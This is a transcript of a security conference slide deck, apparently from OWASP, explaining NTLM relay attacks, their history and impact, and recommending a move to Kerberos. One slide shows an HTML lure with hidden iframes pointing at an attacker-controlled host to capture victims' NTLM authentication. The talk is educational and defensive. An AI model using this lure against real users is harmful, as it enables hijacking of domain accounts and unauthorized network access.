NTLM Relay Attacks - PowerPoint PPT Presentation

1 / 12
About This Presentation
Title:

NTLM Relay Attacks

Description:

The Relay Attack Scenario. Assumptions. Windows-based enterprise, NTLM auth not disabled. Attacker s machine has a local intranet host name (e.g., ... – PowerPoint PPT presentation

Number of Views:226
Avg rating:3.0/5.0
Slides: 13
Provided by: owaspOrg1
Category:
Tags: ntlm | attacks | relay

less

Transcript and Presenter's Notes

Title: NTLM Relay Attacks


1
NTLM Relay Attacks
  • Eric Rachner
  • eric_at_rachner.us
  • http//www.rachner.us

2
The Relay Attack Scenario
  • Assumptions
  • Windows-based enterprise, NTLM auth not disabled
  • Attackers machine has a local intranet host
    name (e.g., http//laptop or http//laptop209.acme
    .com)
  • Exploitability Impact
  • Victim only needs to visit attackers web site
  • Attacker can then access arbitrary network
    resources using the victims domain account

3
About NTLM
  • Part of Windows Integrated Auth protocol suite
  • Enabled by default
  • Essentially a challenge-response design
  • Server transmits challenge / nonce
  • Client computes, sends response

4
The Basic ProblemLack of mutual authentication
A client thinks its authenticating to
http//hacker, but its actually authenticating
to http//targetapp by way of the hackers
machine!
5
History Due Credit
  • 2001 First implemented by Sir Dystic of cDc as
    SMBRelay
  • 2004 Jesse Burns of iSec demonstrates updated
    SMB-based attack at Black Hat(but doesnt
    release the code.)
  • 2007 Metasploit team re-implements SMB attack,
    integrates it into development branch
  • 2008 HTTP-to-HTTP based attack implemented by
    yours truly

6
How It Begins
  • lthtmlgt
  • lt!-- This is the diversion --gt
  • ltiframe src"http//www.youtube.com/v/bGTZoyARvnQ
    rel1autoplay1"
  • type"application/x-shockwave-flash"
  • wmode"transparent"
  • width"425"
  • height"355"gtlt/iframegt
  • lt!-- And this is the nasty part --gt
  • ltiframe height0 src"http//attacker81/"gtlt/ifram
    egt
  • ltiframe height0 src"http//attacker82/"gtlt/ifram
    egt
  • lt/htmlgt

7
Incidentally,
  • I urge you to consider this a rogue server
    problem, and not a man-in-the-middle scenario,
    insofar as the attacker does not need to
  • Poison DNS
  • Spoof ARP packets
  • Re-route traffic
  • Operate a rogue access point
  • Exploit the WPAD problem
  • or otherwise interpose themselves along the
    network path to the targeted server

8
Demo
9
In re. Fear, Uncertainty Doubt
  • Say, is there any reason this attack couldnt
    be leveraged in any scenario where NTLM is
    supported?
  • Handy list of possible targets posted at
    http//www.microsoft.com/products/

10
More Bad News
  • Internet-borne attacks are possible against
    internet-facing apps
  • Clients in coffeeshops easy targets
  • Clients on intranets tougher targets, but
    possibly vulnerable in tricky DNS rebinding
    scenarios

11
Analysis
  • No, SSL is not helpful here.
  • NTLMv2 just as vulnerable as NTLMv1
  • NTLM has numerous other problems(ref. Jesse
    Burns 2004 Moniz Stach, 2005 Grutz, et. al.
    2007)
  • 0-day? More like 2,555-day
  • Long story short migrate away from NTLM, ideally
    towards Kerberos

12
Questions?
  • Eric Rachner
  • eric_at_rachner.us
  • http//www.rachner.us
Write a Comment
User Comments (0)
About PowerShow.com